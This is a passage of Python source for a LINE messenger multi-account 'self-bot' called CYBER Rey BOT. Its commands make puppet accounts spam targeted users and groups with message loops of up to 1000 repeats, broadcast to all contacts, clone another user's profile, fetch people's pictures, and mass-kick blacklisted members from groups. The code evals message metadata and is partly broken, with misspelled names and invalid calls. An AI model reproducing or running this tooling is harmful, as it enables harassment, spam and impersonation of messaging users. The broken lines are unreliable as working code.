ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(msg.to, "Done")
ki2.sendText(msg.to, "Done")
ki3.sendText(msg.to, "Done")
ki4.sendText(msg.to, "Done")
ki5.sendText(msg.to, "Done")
ki6.sendText(msg.to, "Done")
ki7.sendText(msg.to, "Done")
print " Spammed !"
elif "Hallo " in msg.text:
midd = msg.text.replace("Hallo ","")
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
ki.sendText(g.mid,[miid] + "Your Account Has Been Spammed !")
ki2.sendText(g.mid,[midd] + "Your Account Has Been Spammed !")
ki3.sendText(g.mid,[midd] + "Your Account Has Been Spammed !")
ki4.sendText(g.mid,[midd] + "Your Account Has Been Spammed !")
ki5.sendText(g.mid,[midd] + "Your Account Has Been Spammed !")
ki6.sendText(g.mid,[midd] + "Your Account Has Been Spammed !")
ki7.sendText(g.mid,[midd] + "Your Account Has Been Spammed !")
ki.sendText(msg.to, "Done")
ki2.sendText(msg.to, "Done")
ki3.sendText(msg.to, "Done")
ki4.sendText(msg.to, "Done")
ki5.sendText(msg.to, "Done")
ki6.sendText(msg.to, "Done")
ki7.sendText(msg.to, "Done")
print " Spammed !"
#-----------------------------------------------------------)
elif ("Ban " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Bosque")
except:
pass
elif "Unban @" in msg.text:
if msg.toType == 2:
print "[Unban]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif "Ban:" in msg.text:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Locked")
except:
kk.sendText(msg.to,"Error")
elif "Unban:" in msg.text:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
kk.sendText(msg.to,"Error")
#-----------------------------------------------------------
elif "Mycopy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
cl.sendText(msg.to, "Succes Copy profile")
except Exception as e:
print e
elif msg.text in ["Mybackup"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "backup done")
except Exception as e:
cl.sendText(msg.to, str (e))
elif msg.text in ["Bot restart","Reboot"]:
if msg.from_ in admsa:
cl.sendText(msg.to, "Bot Has Been Restarted...")
restart_program()
print "@Restart"
else:
ki.sendText(msg.to, "No Access")
elif msg.text in ["Sticker on"]:
wait["sticker"] = True
cl.sendText(msg.to,"Sticker ID Detect Already On.")
elif msg.text in ["Sticker off"]:
wait["sticker"] = False
cl.sendText(msg.to,"Sticker ID Detect Already Off.")
elif msg.text in ["Backup"]:
try:
ki.updateDisplayPicture(backup1.pictureStatus)
ki.updateProfile(backup1)
ki2.updateDisplayPicture(backup2.pictureStatus)
ki2.updateProfile(backup2)
ki3.updateDisplayPicture(backup3.pictureStatus)
ki3.updateProfile(backup3)
ki4.updateDisplayPicture(backup4.pictureStatus)
ki4.updateProfile(backup4)
ki5.updateDisplayPicture(backup5.pictureStatus)
ki5.updateProfile(backup5)
ki6.updateDisplayPicture(backup6.pictureStatus)
ki6.updateProfile(backup6)
ki7.updateDisplayPicture(backup7.pictureStatus)
ki7.updateProfile(backup7)
ki8.updateDisplayPicture(backup8.pictureStatus)
ki8.updateProfile(backup8)
ki9.updateDisplayPicture(backup9.pictureStatus)
ki9.updateProfile(backup9)
ki10.updateDisplayPicture(backup10.pictureStatus)
ki10.updateProfile(backup10)
cl.sendText(msg.to, "backup done")
except Exception as e:
cl.sendText(msg.to, str (e))
#-----------------------------------------------------------
elif "Mban:" in msg.text:
midd = msg.text.replace("Mban:","")
wait["blacklist"][midd] = True
cl.sendText(msg.to,"Target Lock")
#-----------------------------------------------------<------
elif "#leave" in msg.text:
try:
import sys
sys.exit()
except:
pass
#-----------------------------------------------------------
elif msg.text in ["Sp","Speed","speed"]:
start = time.time()
cl.sendText(msg.to, "Progress...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
ki3.sendText(msg.to, "%sseconds" % (elapsed_time))
ki4.sendText(msg.to, "%sseconds" % (elapsed_time))
ki5.sendText(msg.to, "%sseconds" % (elapsed_time))
ki6.sendText(msg.to, "%sseconds" % (elapsed_time))
ki7.sendText(msg.to, "%sseconds" % (elapsed_time))
ki8.sendText(msg.to, "%sseconds" % (elapsed_time))
ki9.sendText(msg.to, "%sseconds" % (elapsed_time))
ki10.sendText(msg.to, "%sseconds" % (elapsed_time))
#-----------------------------------------------------------
elif msg.text.lower() == 'respons':
profile = ki.getProfile()
text = profile.displayName + ""
cl.sendText(msg.to, text)
profile = ki2.getProfile()
text = profile.displayName + ""
ki.sendText(msg.to, text)
profile = ki3.getProfile()
text = profile.displayName + ""
#-------------------------------------------------------------------
#------------------------------------------------------------------
elif "Getcover @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#------------------------------------------------------------------
elif "Getpict @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getpict @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#------------------------------------------------------------------
elif msg.text in ["Gcreator:inv"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif "Mid @" in msg.text:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
elif msg.text in ["Bans:on"]:
wait["wblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Unbans:on"]:
wait["dblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text.lower() == 'mcheck':
if wait["blacklist"] == {}:
cl.sendText(msg.to," Nothing in the blacklist")
else:
cl.sendText(msg.to," following is a blacklist")
mc = ""
for mi_d in wait["blacklist"]:
mc += "➡" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'banlist':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += "➡" +cl.getContact(mm).displayName + "\n"
cl.sendText(msg.to,cocoa + "Daftar Hitam")
elif msg.text.lower() == 'kill':
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Daftar hitam pengguna tidak ada")
return
for jj in matched_list:
try:
ki.kickoutFromGroup(msg.to,[jj])
ki2.kickoutFromGroup(msg.to,[jj])
ki3.kickoutFromGroup(msg.to,[jj])
ki4.kickoutFromGroup(msg.to,[jj])
ki5.kickoutFromGroup(msg.to,[jj])
ki6.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif "1997" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("1997","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
ki.sendText(msg.to,"Test anu")
ki2.sendText(msg.to,"Misi-Misi")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Tidak ditemukan")
else:
for target in targets:
if not target in Bots:
try:
klist=[ki,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Mayhem done")
elif msg.text.lower() == 'cancel':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled👈")
elif msg.text in ["Mangat","B"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"B")
cl.sendText(msg.to,"B")
cl.sendText(msg.to,"B")
elif "Album" in msg.text:
try:
albumtags = msg.text.replace("Album","")
gid = albumtags[:33]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "We created an album👈")
except:
cl.sendText(msg.to,"Error")
elif "fakec→" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
amid = msg.text.replace("fakec→","")
cl.sendText(msg.to,str(cl.channel.createAlbumF(msg.to,name,amid)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
#-----------------------------------------------
#-----------------------------------------------
elif msg.text.lower() == ["reypro"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
random.choice(KAC).updateGroup(G)
#-----------------------------------------------
elif msg.text in ["ReyPro"]:
if msg.from_ in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
elif msg.text.lower() == 'rey invitebot':
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
elif msg.text.lower() in ["pap owner","pap ryan"]:
link = ["http://dl.profile.line-cdn.net/0hsaE-74FqLE54VACDRjRTGUQRIiMPeioGAGVrLlpcIisHM2gaRjFrfVUGIioANj4RQDM0Lw8EJi5c"]
pilih = random.choice(link)
ki.sendImageWithURL(msg.to,pilih)
elif msg.text.lower() in ["pap admin","pap raisa"]:
link = ["http://dl.profile.line-cdn.net/0hd00mj6gAOx8NFBfScO5ESDFRNXJ6Oj1XdXB8Ky9GYn0jcH1PNXtze38cYXhzJS8dZXJxLngdYSsn"]
pilih = random.choice(link)
ki2.sendImageWithURL(msg.to,pilih)
elif "Nspam: " in msg.text:
bctxt = msg.text.replace("Nspam: ", "")
t = 15
while(t):
ki.sendText(msg.to, (bctxt))
t-=1
elif "Spam: " in msg.text:
bctxt = msg.text.replace("Spam: ", "")
t = 50
while(t):
cl.sendText(msg.to, (bctxt))
t-=1
elif "Spam1: " in msg.text:
bctxt = msg.text.replace("Spam1: ", "")
t = 100
while(t):
ki.sendText(msg.to, (bctxt))
t-=1
elif "Spam2: " in msg.text:
bctxt = msg.text.replace("Spam2: ", "")
t = 200
while(t):
cl.sendText(msg.to, (bctxt))
t-=1
elif "Spam3: " in msg.text:
bctxt = msg.text.replace("Spam3: ", "")
t = 300
while(t):
ki2.sendText(msg.to, (bctxt))
t-=1
elif "Spam4: " in msg.text:
bctxt = msg.text.replace("Spam4: ", "")
t = 400
while(t):
ki3.sendText(msg.to, (bctxt))
t-=1
elif "Spam5: " in msg.text:
bctxt = msg.text.replace("Spam5: ", "")
t = 500
while(t):
cl.sendText(msg.to, (bctxt))
t-=1
elif "GhostSpam: " in msg.text:
bctxt = msg.text.replace("GhostSpam: ", "")
t = 1000
while(t):
ki5.sendText(msg.to, (bctxt))
t-=1
#-----------------------------------------------
elif "Rey1 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
#-----------------------------------------------
elif "Rey2 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
#-----------------------------------------------
elif "Rey3 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
#-----------------------------------------------
elif "Rey4 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki3.updateGroup(G)
#-----------------------------------------------
elif "Rey5 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki5.updateGroup(G)
#-----------------------------------------------
elif "Rey6 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki6.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki6.updateGroup(G)
#-----------------------------------------------
elif "Rey7 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki7.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki7.updateGroup(G)
#-----------------------------------------------
elif msg.text in ["ReyOut"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.sendText(msg.to,"Good bye " + str(ginfo.name) + "\nBot dipaksa keluar Oleh Owner")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
ki6.leaveGroup(msg.to)
ki7.leaveGroup(msg.to)
ki8.leaveGroup(msg.to)
ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey1 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey2 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki2.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey3 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki3.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey4 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki4.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey5 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey6 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki6.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey7 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki7.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey8 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki8.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey9 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki9.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey10 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki10.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey Key" in msg.text:
ki.sendText(msg.to,""" CYBER Rey BOT [Rey] \n\n key Only Kicker \n\n[Rey1 in]\n[1Aditname:]\n[B Cancel]\n??[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Rey1 Gift]\n[Rey1 bye]\n\n
Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ
""")
ki2.sendText(msg.to,""" CYBER Rey BOT [Rey] \n\n key Only Kicker \n\n[Rey1 in]\n[1Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Rey1 Gift]\n[Rey1 bye]\n\n
Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ
""")
ki3.sendText(msg.to,""" CYBER Rey BOT [Rey] \n\n key Only Kicker \n\n[Rey1 in]\n[1Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Rey1 Gift]\n[Rey1 bye]\n\n
Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ
""")
ki4.sendText(msg.to,""" CYBER Rey BOT [Rey] \n\n key Only Kicker \n\n[Rey1 in]\n??[1Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Rey1 Gift]\n??[Rey1 bye]\n\n
Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ
""")
ki5.sendText(msg.to,""" ?? CYBER Rey BOT [Rey] \n\n key Only Kicker \n\n[Rey1 in]\n[1Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n??[kill]\n[BotChat]\n??[Respons]\n[Rey1 Gift]\n??[Rey1 bye]\n\n
Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ
""")
ki6.sendText(msg.to,""" CYBER Rey BOT [Rey] \n\n key Only Kicker \n\n[Rey1 in]\n[1Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Rey1 Gift]\n[Rey1 bye]\n\n
g
Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ
""")
#-----------------------------------------------
elif msg.text in ["Welcome","wc","welcome","Wc"]:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Hosgeldiniz" + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.admin.displayName )
elif "Rey Say " in msg.text:
bctxt = msg.text.replace("Rey Say ","")
ki2.sendText(msg.to,(bctxt))
elif "BotBc: " in msg.text:
bc = msg.text.replace("BotBc: ","")
gid = ki.getGroupIdsJoined()
if msg.from_ in admsa:
for i in gid:
ki.sendText(i,"=======[BROADCAST]=======\n\n"+bc+"\n\nContact Me : line.me/ti/p/~s.k.9.7")
ki.sendText(msg.to,"Success BC BosQ")
else:
ki.sendText(msg.to,"Khusus Ryan")
elif "Scbc " in msg.text:
bctxt = msg.text.replace("Scbc ", "")
orang = cl.getAllContactIds()
t = 20
for manusia in orang:
while(t):
cl.sendText(manusia, (bctxt))
t-=1
elif "Cbc " in msg.text:
broadcasttxt = msg.text.replace("Cbc ", "")
orang = cl.getAllContactIds()
for manusia in orang:
cl.sendText(manusia, (broadcasttxt))
elif msg.text in ["Cancel"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
cl.sendText(msg.to,"All invitations have been refused")
elif "say" in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Bc ","")
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
ki6.sendText(msg.to,(bctxt))
ki7.sendText(msg.to,(bctxt))
k8.sendText(msg.to,(bctxt))
